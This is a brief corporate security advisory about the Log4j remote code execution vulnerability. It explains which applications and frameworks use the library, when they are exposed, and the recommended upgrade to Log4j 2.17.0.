A vulnerability in the Log4J logging library allows an unauthenticated attacker to perform remote code execution and gain complete access to a target system via a vulnerable version of the Log4J library. Any application that uses Log4J is potentially affected.
&Partners is aware of the vulnerability. We are actively working with partners and vendors to mitigate potential exploits.
Log4j is an open-source Java logging library developed by the Apache Foundation. It is widely used in many applications and is present in many services as a dependency. This includes enterprise applications, including custom applications developed within an organisation, as well as numerous cloud services.
The Log4j library is frequently used in enterprise Java software and is included in Apache frameworks including Apache Struts2, Apache Solr, Apache Druid, Apache Flink and Apache Swift. Other large projects Including Netty, MyBatis and the Spring Framework also make use of the library.
An application is vulnerable if it consumes untrusted user input and passes this to a vulnerable version of the Log4j logging library.
Version 1 of the Log4j library is no longer supported and is affected by multiple security vulnerabilities. Developers should migrate to the latest version of Log4j (currently Log4j 2.17.0).
